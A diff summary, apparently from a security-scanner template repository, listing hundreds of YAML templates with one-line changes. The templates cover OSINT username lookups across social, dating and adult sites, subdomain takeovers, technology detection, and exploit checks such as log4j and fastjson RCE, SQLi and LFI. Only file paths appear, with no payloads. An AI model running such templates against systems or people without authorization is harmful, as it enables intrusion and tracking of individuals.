http/osint/patronite.yaml | 2 +- http/osint/paypal.yaml | 2 +- http/osint/pcgamer.yaml | 2 +- http/osint/pcpartpicker.yaml | 2 +- http/osint/peing.yaml | 2 +- http/osint/periscope.yaml | 2 +- http/osint/pettingzooco-mastodon-instance.yaml | 2 +- http/osint/pewex.yaml | 2 +- http/osint/picsart.yaml | 2 +- http/osint/piekielni.yaml | 2 +- http/osint/pikabu.yaml | 2 +- http/osint/pillowfort.yaml | 2 +- http/osint/pinkbike.yaml | 2 +- http/osint/pinterest.yaml | 2 +- http/osint/pixelfedsocial.yaml | 2 +- http/osint/platzi.yaml | 2 +- http/osint/playstation-network.yaml | 2 +- http/osint/plurk.yaml | 2 +- http/osint/pokec.yaml | 2 +- http/osint/pokemonshowdown.yaml | 2 +- http/osint/pokerstrategy.yaml | 2 +- http/osint/polchatpl.yaml | 2 +- http/osint/policja2009.yaml | 2 +- http/osint/poll-everywhere.yaml | 2 +- http/osint/polygon.yaml | 2 +- http/osint/polywork.yaml | 2 +- http/osint/popl.yaml | 2 +- http/osint/pornhub-porn-stars.yaml | 2 +- http/osint/pornhub-users.yaml | 2 +- http/osint/poshmark.yaml | 2 +- http/osint/postcrossing.yaml | 2 +- http/osint/postnews.yaml | 2 +- http/osint/poweredbygaysocial-mastodon-instance.yaml | 2 +- http/osint/producthunt.yaml | 2 +- http/osint/promodj.yaml | 2 +- http/osint/pronounspage.yaml | 2 +- http/osint/pronouny.yaml | 2 +- http/osint/prose.yaml | 2 +- http/osint/prvpl.yaml | 2 +- http/osint/psstaudio.yaml | 2 +- http/osint/public.yaml | 2 +- http/osint/pypi.yaml | 2 +- http/osint/queer.yaml | 2 +- http/osint/quitterpl.yaml | 2 +- http/osint/quora.yaml | 2 +- http/osint/raddleme.yaml | 2 +- http/osint/rantli.yaml | 2 +- http/osint/reblogme.yaml | 2 +- http/osint/redbubble.yaml | 2 +- http/osint/reddit.yaml | 2 +- http/osint/redgifs.yaml | 2 +- http/osint/refsheet.yaml | 2 +- http/osint/researchgate.yaml | 2 +- http/osint/resumes-actorsaccess.yaml | 2 +- http/osint/revolut.yaml | 2 +- http/osint/riskru.yaml | 2 +- http/osint/roblox.yaml | 2 +- http/osint/rsi.yaml | 2 +- http/osint/ru-123rf.yaml | 2 +- http/osint/rumblechannel.yaml | 2 +- http/osint/rumbleuser.yaml | 2 +- http/osint/salon24.yaml | 2 +- http/osint/saracartershow.yaml | 2 +- http/osint/scoutwiki.yaml | 2 +- http/osint/scratch.yaml | 2 +- http/osint/secure-donation.yaml | 2 +- http/osint/seneporno.yaml | 2 +- http/osint/sentimente.yaml | 2 +- http/osint/seoclerks.yaml | 2 +- http/osint/setlistfm.yaml | 2 +- http/osint/sexworker.yaml | 2 +- http/osint/sfd.yaml | 2 +- http/osint/shanii-writes.yaml | 2 +- http/osint/shesfreaky.yaml | 2 +- http/osint/shopify.yaml | 2 +- http/osint/shutterstock.yaml | 2 +- http/osint/skeb.yaml | 2 +- http/osint/skillshare.yaml | 2 +- http/osint/skyrock.yaml | 2 +- http/osint/slackholes.yaml | 2 +- http/osint/slant.yaml | 2 +- http/osint/slides.yaml | 2 +- http/osint/slideshare.yaml | 2 +- http/osint/smashrun.yaml | 2 +- http/osint/smelsy.yaml | 2 +- http/osint/smugmug.yaml | 2 +- http/osint/smule.yaml | 2 +- http/osint/snapchat-stories.yaml | 2 +- http/osint/snapchat.yaml | 2 +- http/osint/snipfeed.yaml | 2 +- http/osint/soccitizen4eu.yaml | 2 +- http/osint/social-msdn.yaml | 2 +- http/osint/socialbundde.yaml | 2 +- http/osint/sofurry.yaml | 2 +- http/osint/solikick.yaml | 2 +- http/osint/soloby.yaml | 2 +- http/osint/soloto.yaml | 2 +- http/osint/soundcloud.yaml | 2 +- http/osint/soup.yaml | 2 +- http/osint/sourceforge.yaml | 2 +- http/osint/speaker-deck.yaml | 2 +- http/osint/speedrun.yaml | 2 +- http/osint/spiceworks.yaml | 2 +- http/osint/sporcle.yaml | 2 +- http/osint/spotify.yaml | 2 +- http/osint/steam.yaml | 2 +- http/osint/steemit.yaml | 2 +- http/osint/steller.yaml | 2 +- http/osint/stonerssocial-mastodon-instance.yaml | 2 +- http/osint/storycorps.yaml | 2 +- http/osint/streamelements.yaml | 2 +- http/osint/streamlabs.yaml | 2 +- http/osint/stripchat.yaml | 2 +- http/osint/subscribestar.yaml | 2 +- http/osint/sukebeinyaasi.yaml | 2 +- http/osint/suzuri.yaml | 2 +- http/osint/szmerinfo.yaml | 2 +- http/osint/tabletoptournament.yaml | 2 +- http/osint/tagged.yaml | 2 +- http/osint/tamtam.yaml | 2 +- http/osint/tanukipl.yaml | 2 +- http/osint/tapitag.yaml | 2 +- http/osint/tappy.yaml | 2 +- http/osint/taringa.yaml | 2 +- http/osint/taskrabbit.yaml | 2 +- http/osint/teamtreehouse.yaml | 2 +- http/osint/teddygirls.yaml | 2 +- http/osint/teespring.yaml | 2 +- http/osint/teknik.yaml | 2 +- http/osint/telegram.yaml | 2 +- http/osint/tellonym.yaml | 2 +- http/osint/tenor.yaml | 2 +- http/osint/tf2-backpack-examiner.yaml | 2 +- http/osint/thegatewaypundit.yaml | 2 +- http/osint/theguardian.yaml | 2 +- http/osint/themeforest.yaml | 2 +- http/osint/thetattooforum.yaml | 2 +- http/osint/tiktok.yaml | 2 +- http/osint/tildezone-mastodon-instance.yaml | 2 +- http/osint/tinder.yaml | 2 +- http/osint/tmdb.yaml | 2 +- http/osint/tootingch-mastodon-instance.yaml | 2 +- http/osint/totalwar.yaml | 2 +- http/osint/toyhouse.yaml | 2 +- http/osint/trackmanialadder.yaml | 2 +- http/osint/tradingview.yaml | 2 +- http/osint/trakt.yaml | 2 +- http/osint/trello.yaml | 2 +- http/osint/tripadvisor.yaml | 2 +- http/osint/truth-social.yaml | 2 +- http/osint/tryhackme.yaml | 2 +- http/osint/tumblr.yaml | 2 +- http/osint/tunefind.yaml | 2 +- http/osint/twitcasting.yaml | 2 +- http/osint/twitch.yaml | 2 +- http/osint/twitter-archived-profile.yaml | 2 +- http/osint/twitter-archived-tweets.yaml | 2 +- http/osint/twitter.yaml | 2 +- http/osint/twpro.yaml | 2 +- http/osint/ubisoft.yaml | 2 +- http/osint/udemy.yaml | 2 +- http/osint/uefconnect.yaml | 2 +- http/osint/uid.yaml | 2 +- http/osint/uiuxdevsocial-mastodon-instance.yaml | 2 +- http/osint/ultras-diary.yaml | 2 +- http/osint/ulubpl.yaml | 2 +- http/osint/unsplash.yaml | 2 +- http/osint/untappd.yaml | 2 +- http/osint/usa-life.yaml | 2 +- http/osint/utipio.yaml | 2 +- http/osint/uwuai.yaml | 2 +- http/osint/uwumarket.yaml | 2 +- http/osint/venmo.yaml | 2 +- http/osint/vero.yaml | 2 +- http/osint/vibilagare.yaml | 2 +- http/osint/viddler.yaml | 2 +- http/osint/vimeo.yaml | 2 +- http/osint/vine.yaml | 2 +- http/osint/vip-blog.yaml | 2 +- http/osint/virustotal.yaml | 2 +- http/osint/visnesscard.yaml | 2 +- http/osint/vivino.yaml | 2 +- http/osint/vk.yaml | 2 +- http/osint/vklworld-mastodon-instance.yaml | 2 +- http/osint/vmstio-mastodon-instance.yaml | 2 +- http/osint/voice123.yaml | 2 +- http/osint/voicescom.yaml | 2 +- http/osint/vsco.yaml | 2 +- http/osint/wanelo.yaml | 2 +- http/osint/warriorforum.yaml | 2 +- http/osint/watchmemorecom.yaml | 2 +- http/osint/watchmyfeed.yaml | 2 +- http/osint/wattpad.yaml | 2 +- http/osint/weasyl.yaml | 2 +- http/osint/weebly.yaml | 2 +- http/osint/wego.yaml | 2 +- http/osint/weheartit.yaml | 2 +- http/osint/weibo.yaml | 2 +- http/osint/wetransfer.yaml | 2 +- http/osint/wikidot.yaml | 2 +- http/osint/wikipedia.yaml | 2 +- http/osint/wimkin-publicprofile.yaml | 2 +- http/osint/wireclub.yaml | 2 +- http/osint/wishlistr.yaml | 2 +- http/osint/wolni-slowianie.yaml | 2 +- http/osint/wordnik.yaml | 2 +- http/osint/wordpress-support.yaml | 2 +- http/osint/wordpress.yaml | 2 +- http/osint/wowhead.yaml | 2 +- http/osint/wykop.yaml | 2 +- http/osint/xanga.yaml | 2 +- http/osint/xbox-gamertag.yaml | 2 +- http/osint/xhamster.yaml | 2 +- http/osint/xing.yaml | 2 +- http/osint/xvideos-models.yaml | 2 +- http/osint/xvideos-profiles.yaml | 2 +- http/osint/yahoo-japan-auction.yaml | 2 +- http/osint/yapishu.yaml | 2 +- http/osint/yazawaj.yaml | 2 +- http/osint/yelp.yaml | 2 +- http/osint/youpic.yaml | 2 +- http/osint/youtube.yaml | 2 +- http/osint/zatrybipl.yaml | 2 +- http/osint/zbiornik.yaml | 2 +- http/osint/zhihu.yaml | 2 +- http/osint/zillow.yaml | 2 +- http/osint/zmarsacom.yaml | 2 +- http/osint/zomato.yaml | 2 +- http/osint/zoomitir.yaml | 2 +- http/takeovers/aftership-takeover.yaml | 2 +- http/takeovers/agilecrm-takeover.yaml | 2 +- http/takeovers/aha-takeover.yaml | 2 +- http/technologies/apollo-server-detect.yaml | 2 +- http/technologies/catalog-creator-detect.yaml | 2 +- http/technologies/csrfguard-detect.yaml | 2 +- http/technologies/elasticsearch-sql-client-detect.yaml | 2 +- http/technologies/elfinder-detect.yaml | 2 +- http/technologies/elfinder-version.yaml | 2 +- http/technologies/fingerprinthub-web-fingerprints.yaml | 2 +- http/technologies/geo-webserver-detect.yaml | 2 +- http/technologies/gnuboard-detect.yaml | 2 +- http/technologies/hp-blade-admin-detect.yaml | 2 +- http/technologies/icecast-mediaserver-detect.yaml | 2 +- http/technologies/influxdb-version-detect.yaml | 2 +- http/technologies/magento-version-detect.yaml | 2 +- http/technologies/nacos-version.yaml | 2 +- http/technologies/neos-detect.yaml | 2 +- http/technologies/netsweeper-webadmin-detect.yaml | 2 +- http/technologies/node-red-detect.yaml | 2 +- http/technologies/ntop-detect.yaml | 2 +- http/technologies/open-virtualization-manager-detect.yaml | 2 +- http/technologies/oracle/oracle-atg-commerce.yaml | 2 +- http/technologies/osquery-fleet-detect.yaml | 2 +- http/technologies/phppgadmin-version.yaml | 2 +- http/technologies/projectsend-detect.yaml | 2 +- http/technologies/secui-waf-detect.yaml | 2 +- http/technologies/snipeit-panel.yaml | 2 +- http/technologies/sonicwall-email-security-detect.yaml | 2 +- http/technologies/splash-rendering-service.yaml | 2 +- http/technologies/swag-instance-default-page.yaml | 2 +- http/technologies/synology-web-station.yaml | 2 +- http/technologies/telerik/telerik-dialoghandler-detect.yaml | 2 +- http/technologies/telerik/telerik-fileupload-detect.yaml | 2 +- http/technologies/teradici-pcoip.yaml | 2 +- http/technologies/thinkcmf-detect.yaml | 2 +- http/technologies/thinkphp-detect.yaml | 2 +- http/technologies/tileserver-gl.yaml | 2 +- http/technologies/tornado-server-login.yaml | 2 +- http/technologies/vmware/vmware-site-recovery-manager.yaml | 2 +- http/technologies/waf-detect.yaml | 2 +- http/technologies/wuzhicms-detect.yaml | 2 +- http/technologies/yeswiki-detect.yaml | 2 +- http/token-spray/api-blockchain.yaml | 2 +- http/token-spray/api-vercel.yaml | 2 +- http/vulnerabilities/apache/apache-flink-unauth-rce.yaml | 2 +- http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml | 2 +- http/vulnerabilities/apache/apache-solr-file-read.yaml | 2 +- http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml | 2 +- http/vulnerabilities/avaya/avaya-aura-xss.yaml | 2 +- http/vulnerabilities/backdoor/jexboss-backdoor.yaml | 2 +- .../cisco/cisco-cloudcenter-suite-log4j-rce.yaml | 2 +- .../cisco/cisco-unified-communications-log4j.yaml | 2 +- http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml | 2 +- http/vulnerabilities/code42/code42-log4j-rce.yaml | 2 +- http/vulnerabilities/concrete/concrete-xss.yaml | 2 +- .../confluence/confluence-ssrf-sharelinks.yaml | 2 +- http/vulnerabilities/dedecms/dedecms-config-xss.yaml | 2 +- http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml | 2 +- http/vulnerabilities/dedecms/dedecms-openredirect.yaml | 2 +- http/vulnerabilities/dedecms/dedecms-rce.yaml | 2 +- http/vulnerabilities/deos-open500-admin.yaml | 2 +- http/vulnerabilities/drupal/drupal-avatar-xss.yaml | 2 +- http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml | 2 +- http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml | 2 +- http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml | 2 +- http/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml | 2 +- http/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml | 2 +- http/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml | 2 +- http/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml | 2 +- http/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml | 2 +- http/vulnerabilities/froxlor-xss.yaml | 2 +- http/vulnerabilities/generic/basic-xss-prober.yaml | 2 +- http/vulnerabilities/generic/crlf-injection.yaml | 2 +- http/vulnerabilities/generic/error-based-sql-injection.yaml | 2 +- http/vulnerabilities/generic/generic-j2ee-lfi.yaml | 2 +- http/vulnerabilities/generic/generic-linux-lfi.yaml | 2 +- http/vulnerabilities/generic/generic-windows-lfi.yaml | 2 +- http/vulnerabilities/generic/top-xss-params.yaml | 2 +- http/vulnerabilities/gitlab/gitlab-rce.yaml | 2 +- http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml | 2 +- http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml | 2 +- http/vulnerabilities/gnuboard/gnuboard5-xss.yaml | 2 +- http/vulnerabilities/httpbin/httpbin-open-redirect.yaml | 2 +- http/vulnerabilities/httpbin/httpbin-xss.yaml | 2 +- http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml | 2 +- http/vulnerabilities/ibm/eclipse-help-system-xss.yaml | 2 +- http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml | 2 +- http/vulnerabilities/j2ee/liferay-resource-leak.yaml | 2 +- http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml | 2 +- http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml | 2 +- http/vulnerabilities/joomla/rusty-joomla.yaml | 2 +- http/vulnerabilities/laravel/laravel-ignition-xss.yaml | 2 +- http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml | 2 +- .../vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml | 2 +- http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml | 2 +- http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml | 2 +- http/vulnerabilities/moodle/moodle-xss.yaml | 2 +- http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml | 2 +- http/vulnerabilities/netsweeper/netsweeper-rxss.yaml | 2 +- http/vulnerabilities/opencpu/opencpu-rce.yaml | 2 +- .../oracle/oracle-ebs-bispgraph-file-access.yaml | 2 +- http/vulnerabilities/oracle/oracle-ebs-xss.yaml | 2 +- http/vulnerabilities/oracle/oracle-siebel-xss.yaml | 2 +- http/vulnerabilities/oscommerce/oscommerce-rce.yaml | 2 +- http/vulnerabilities/other/3cx-management-console.yaml | 2 +- http/vulnerabilities/other/74cms-sqli.yaml | 2 +- http/vulnerabilities/other/WSO2-2019-0598.yaml | 2 +- http/vulnerabilities/other/academy-lms-xss.yaml | 2 +- http/vulnerabilities/other/accent-microcomputers-lfi.yaml | 2 +- http/vulnerabilities/other/acme-xss.yaml | 2 +- http/vulnerabilities/other/aerocms-sqli.yaml | 2 +- http/vulnerabilities/other/alumni-management-sqli.yaml | 2 +- http/vulnerabilities/other/antsword-backdoor.yaml | 2 +- http/vulnerabilities/other/asanhamayesh-lfi.yaml | 2 +- http/vulnerabilities/other/aspnuke-openredirect.yaml | 2 +- http/vulnerabilities/other/avada-xss.yaml | 2 +- http/vulnerabilities/other/bems-api-lfi.yaml | 2 +- http/vulnerabilities/other/beward-ipcamera-disclosure.yaml | 2 +- http/vulnerabilities/other/bitrix-open-redirect.yaml | 2 +- http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml | 2 +- http/vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- .../vulnerabilities/other/carel-bacnet-gateway-traversal.yaml | 2 +- http/vulnerabilities/other/carrental-xss.yaml | 2 +- http/vulnerabilities/other/caucho-resin-info-disclosure.yaml | 2 +- http/vulnerabilities/other/chamilo-lms-sqli.yaml | 2 +- http/vulnerabilities/other/chamilo-lms-xss.yaml | 2 +- http/vulnerabilities/other/ckan-dom-based-xss.yaml | 2 +- http/vulnerabilities/other/coldfusion-debug-xss.yaml | 2 +- http/vulnerabilities/other/commax-biometric-auth-bypass.yaml | 2 +- http/vulnerabilities/other/commax-credentials-disclosure.yaml | 2 +- http/vulnerabilities/other/comtrend-password-exposure.yaml | 2 +- http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml | 2 +- http/vulnerabilities/other/couchdb-adminparty.yaml | 2 +- http/vulnerabilities/other/crystal-live-server-lfi.yaml | 2 +- http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml | 2 +- http/vulnerabilities/other/cvms-sqli.yaml | 2 +- http/vulnerabilities/other/dicoogle-pacs-lfi.yaml | 2 +- http/vulnerabilities/other/digitalrebar-traversal.yaml | 2 +- http/vulnerabilities/other/discourse-xss.yaml | 2 +- http/vulnerabilities/other/dixell-xweb500-filewrite.yaml | 2 +- http/vulnerabilities/other/dotnetcms-sqli.yaml | 2 +- http/vulnerabilities/other/dss-download-fileread.yaml | 2 +- http/vulnerabilities/other/duomicms-sql-injection.yaml | 2 +- http/vulnerabilities/other/dzzoffice-xss.yaml | 2 +- http/vulnerabilities/other/ecshop-sqli.yaml | 2 +- http/vulnerabilities/other/ecsimagingpacs-rce.yaml | 2 +- http/vulnerabilities/other/eibiz-lfi.yaml | 2 +- http/vulnerabilities/other/elFinder-path-traversal.yaml | 2 +- http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml | 2 +- http/vulnerabilities/other/empirecms-xss.yaml | 2 +- http/vulnerabilities/other/ems-sqli.yaml | 2 +- http/vulnerabilities/other/eris-xss.yaml | 2 +- http/vulnerabilities/other/etouch-v2-sqli.yaml | 2 +- http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml | 2 +- http/vulnerabilities/other/eyelock-nano-lfd.yaml | 2 +- http/vulnerabilities/other/fatpipe-auth-bypass.yaml | 2 +- http/vulnerabilities/other/fatpipe-backdoor.yaml | 2 +- http/vulnerabilities/other/feifeicms-lfr.yaml | 2 +- http/vulnerabilities/other/finecms-sqli.yaml | 2 +- http/vulnerabilities/other/finereport-path-traversal.yaml | 2 +- http/vulnerabilities/other/flatpress-xss.yaml | 2 +- http/vulnerabilities/other/flir-path-traversal.yaml | 2 +- http/vulnerabilities/other/geovision-geowebserver-lfi.yaml | 2 +- http/vulnerabilities/other/geovision-geowebserver-xss.yaml | 2 +- http/vulnerabilities/other/global-domains-lfi.yaml | 2 +- http/vulnerabilities/other/global-domains-xss.yaml | 2 +- http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml | 2 +- http/vulnerabilities/other/goip-1-lfi.yaml | 2 +- http/vulnerabilities/other/graylog-log4j.yaml | 2 +- http/vulnerabilities/other/groupoffice-lfi.yaml | 2 +- http/vulnerabilities/other/gsoap-lfi.yaml | 2 +- http/vulnerabilities/other/h3c-imc-rce.yaml | 2 +- http/vulnerabilities/other/hanming-lfr.yaml | 2 +- http/vulnerabilities/other/hashicorp-consul-rce.yaml | 2 +- http/vulnerabilities/other/hasura-graphql-psql-exec.yaml | 2 +- http/vulnerabilities/other/hiboss-rce.yaml | 2 +- http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml | 2 +- .../other/hjtcloud-rest-arbitrary-file-read.yaml | 2 +- .../vulnerabilities/other/homeautomation-v3-openredirect.yaml | 2 +- http/vulnerabilities/other/hospital-management-xss.yaml | 2 +- http/vulnerabilities/other/hospital-management-xss2.yaml | 2 +- http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml | 2 +- http/vulnerabilities/other/huawei-hg659-lfi.yaml | 2 +- http/vulnerabilities/other/huawei-router-auth-bypass.yaml | 2 +- http/vulnerabilities/other/huijietong-cloud-fileread.yaml | 2 +- http/vulnerabilities/other/icewarp-open-redirect.yaml | 2 +- http/vulnerabilities/other/icewarp-webclient-rce.yaml | 2 +- http/vulnerabilities/other/inspur-clusterengine-rce.yaml | 2 +- http/vulnerabilities/other/interlib-fileread.yaml | 2 +- http/vulnerabilities/other/java-melody-xss.yaml | 2 +- http/vulnerabilities/other/jeewms-lfi.yaml | 2 +- http/vulnerabilities/other/jinfornet-jreport-lfi.yaml | 2 +- http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml | 2 +- http/vulnerabilities/other/kafdrop-xss.yaml | 2 +- http/vulnerabilities/other/karel-ip-phone-lfi.yaml | 2 +- http/vulnerabilities/other/kavita-lfi.yaml | 2 +- http/vulnerabilities/other/kevinlab-bems-backdoor.yaml | 2 +- http/vulnerabilities/other/kevinlab-bems-sqli.yaml | 2 +- http/vulnerabilities/other/kevinlab-hems-backdoor.yaml | 2 +- http/vulnerabilities/other/keycloak-xss.yaml | 2 +- .../other/kingdee-eas-directory-traversal.yaml | 2 +- http/vulnerabilities/other/kingsoft-v8-file-read.yaml | 2 +- http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml | 2 +- http/vulnerabilities/other/laravel-filemanager-lfi.yaml | 2 +- http/vulnerabilities/other/loancms-sqli.yaml | 2 +- http/vulnerabilities/other/lotuscms-rce.yaml | 2 +- http/vulnerabilities/other/lucee-xss.yaml | 2 +- http/vulnerabilities/other/maccmsv10-backdoor.yaml | 2 +- http/vulnerabilities/other/magicflow-lfi.yaml | 2 +- http/vulnerabilities/other/mcafee-epo-rce.yaml | 2 +- http/vulnerabilities/other/metinfo-lfi.yaml | 2 +- http/vulnerabilities/other/microweber-xss.yaml | 2 +- http/vulnerabilities/other/mida-eframework-xss.yaml | 2 +- http/vulnerabilities/other/minimouse-lfi.yaml | 2 +- http/vulnerabilities/other/mirai-unknown-rce.yaml | 2 +- http/vulnerabilities/other/mpsec-lfi.yaml | 2 +- http/vulnerabilities/other/myucms-lfr.yaml | 2 +- http/vulnerabilities/other/natshell-path-traversal.yaml | 2 +- http/vulnerabilities/other/natshell-rce.yaml | 2 +- http/vulnerabilities/other/netgear-router-auth-bypass.yaml | 2 +- http/vulnerabilities/other/netgear-router-exposure.yaml | 2 +- .../other/netgear-wac124-router-auth-bypass.yaml | 2 +- http/vulnerabilities/other/netis-info-leak.yaml | 2 +- http/vulnerabilities/other/nextjs-redirect.yaml | 2 +- .../other/nginx-merge-slashes-path-traversal.yaml | 2 +- http/vulnerabilities/other/nginx-module-vts-xss.yaml | 2 +- http/vulnerabilities/other/ns-asg-file-read.yaml | 2 +- http/vulnerabilities/other/nuuo-file-inclusion.yaml | 2 +- http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml | 2 +- http/vulnerabilities/other/odoo-cms-redirect.yaml | 2 +- http/vulnerabilities/other/oliver-library-lfi.yaml | 2 +- http/vulnerabilities/other/onlinefarm-management-xss.yaml | 2 +- http/vulnerabilities/other/opencti-lfi.yaml | 2 +- http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml | 2 +- http/vulnerabilities/other/opensis-lfi.yaml | 2 +- http/vulnerabilities/other/opensns-rce.yaml | 2 +- http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml | 2 +- http/vulnerabilities/other/oracle-fatwire-lfi.yaml | 2 +- http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml | 2 +- http/vulnerabilities/other/otobo-open-redirect.yaml | 2 +- http/vulnerabilities/other/pacsone-server-lfi.yaml | 2 +- http/vulnerabilities/other/parallels-hsphere-xss.yaml | 2 +- http/vulnerabilities/other/parentlink-xss.yaml | 2 +- .../other/pbootcms-database-file-download.yaml | 2 +- http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml | 2 +- http/vulnerabilities/other/php-timeclock-xss.yaml | 2 +- http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml | 2 +- http/vulnerabilities/other/phpok-sqli.yaml | 2 +- http/vulnerabilities/other/phpwiki-lfi.yaml | 2 +- http/vulnerabilities/other/pmb-directory-traversal.yaml | 2 +- http/vulnerabilities/other/pmb-local-file-disclosure.yaml | 2 +- http/vulnerabilities/other/pollbot-redirect.yaml | 2 +- http/vulnerabilities/other/powercreator-cms-rce.yaml | 2 +- http/vulnerabilities/other/processmaker-lfi.yaml | 2 +- http/vulnerabilities/other/qcubed-xss.yaml | 2 +- .../other/qi-anxin-netkang-next-generation-firewall-rce.yaml | 2 +- http/vulnerabilities/other/qihang-media-disclosure.yaml | 2 +- http/vulnerabilities/other/qihang-media-lfi.yaml | 2 +- http/vulnerabilities/other/rconfig-file-upload.yaml | 2 +- http/vulnerabilities/other/reddittop-rss-xss.yaml | 2 +- http/vulnerabilities/other/rockmongo-xss.yaml | 2 +- http/vulnerabilities/other/sap-redirect.yaml | 2 +- http/vulnerabilities/other/sar2html-rce.yaml | 2 +- http/vulnerabilities/other/seacms-sqli.yaml | 2 +- http/vulnerabilities/other/seowon-router-rce.yaml | 2 +- http/vulnerabilities/other/sick-beard-xss.yaml | 2 +- http/vulnerabilities/other/siteminder-dom-xss.yaml | 2 +- http/vulnerabilities/other/sl-studio-lfi.yaml | 2 +- http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml | 2 +- http/vulnerabilities/other/solar-log-authbypass.yaml | 2 +- http/vulnerabilities/other/solarview-compact-xss.yaml | 2 +- http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml | 2 +- http/vulnerabilities/other/steve-xss.yaml | 2 +- http/vulnerabilities/other/surrealtodo-lfi.yaml | 2 +- http/vulnerabilities/other/symantec-messaging-gateway.yaml | 2 +- http/vulnerabilities/other/tamronos-rce.yaml | 2 +- http/vulnerabilities/other/thinkific-redirect.yaml | 2 +- http/vulnerabilities/other/thruk-xss.yaml | 2 +- http/vulnerabilities/other/tikiwiki-reflected-xss.yaml | 2 +- http/vulnerabilities/other/tpshop-directory-traversal.yaml | 2 +- http/vulnerabilities/other/turbocrm-xss.yaml | 2 +- http/vulnerabilities/other/ueditor-file-upload.yaml | 2 +- http/vulnerabilities/other/umbraco-base-ssrf.yaml | 2 +- http/vulnerabilities/other/unauth-hoteldruid-panel.yaml | 2 +- http/vulnerabilities/other/unauth-spark-api.yaml | 2 +- http/vulnerabilities/other/unifi-network-log4j-rce.yaml | 2 +- http/vulnerabilities/other/vanguard-post-xss.yaml | 2 +- http/vulnerabilities/other/viewlinc-crlf-injection.yaml | 2 +- http/vulnerabilities/other/vpms-auth-bypass.yaml | 2 +- http/vulnerabilities/other/wapples-firewall-lfi.yaml | 2 +- .../other/watchguard-credentials-disclosure.yaml | 2 +- http/vulnerabilities/other/webui-rce.yaml | 2 +- http/vulnerabilities/other/wems-manager-xss.yaml | 2 +- http/vulnerabilities/other/wuzhicms-sqli.yaml | 2 +- http/vulnerabilities/other/xdcms-sqli.yaml | 2 +- http/vulnerabilities/other/xerox-efi-lfi.yaml | 2 +- http/vulnerabilities/other/yapi-rce.yaml | 2 +- http/vulnerabilities/other/yarn-resourcemanager-rce.yaml | 2 +- http/vulnerabilities/other/yeswiki-sql.yaml | 2 +- http/vulnerabilities/other/yeswiki-stored-xss.yaml | 2 +- http/vulnerabilities/other/yeswiki-xss.yaml | 2 +- http/vulnerabilities/other/yishaadmin-lfi.yaml | 2 +- http/vulnerabilities/other/zcms-v3-sqli.yaml | 2 +- http/vulnerabilities/other/zimbra-preauth-ssrf.yaml | 2 +- http/vulnerabilities/other/zms-auth-bypass.yaml | 2 +- http/vulnerabilities/other/zms-sqli.yaml | 2 +- http/vulnerabilities/other/zzcms-xss.yaml | 2 +- http/vulnerabilities/portainer-init-deploy.yaml | 2 +- http/vulnerabilities/rails/rails6-xss.yaml | 2 +- http/vulnerabilities/rocketchat/unauth-message-read.yaml | 1 - .../vulnerabilities/royalevent/royalevent-management-xss.yaml | 2 +- http/vulnerabilities/royalevent/royalevent-stored-xss.yaml | 2 +- http/vulnerabilities/ruijie-eg-login-rce.yaml | 2 +- http/vulnerabilities/ruijie/ruijie-eg-rce.yaml | 2 +- http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml | 2 +- http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml | 2 +- http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml | 2 +- http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml | 2 +- http/vulnerabilities/sangfor/sangfor-ba-rce.yaml | 2 +- http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml | 2 +- http/vulnerabilities/sangfor/sangfor-edr-rce.yaml | 2 +- http/vulnerabilities/seeyon/wooyun-2015-148227.yaml | 2 +- http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml | 2 +- http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml | 2 +- http/vulnerabilities/springboot/springboot-h2-db-rce.yaml | 2 +- http/vulnerabilities/springboot/springboot-log4j-rce.yaml | 2 +- http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml | 2 +- http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml | 2 +- .../squirrelmail/squirrelmail-vkeyboard-xss.yaml | 2 +- .../thinkcmf/thinkcmf-arbitrary-code-execution.yaml | 2 +- http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml | 2 +- 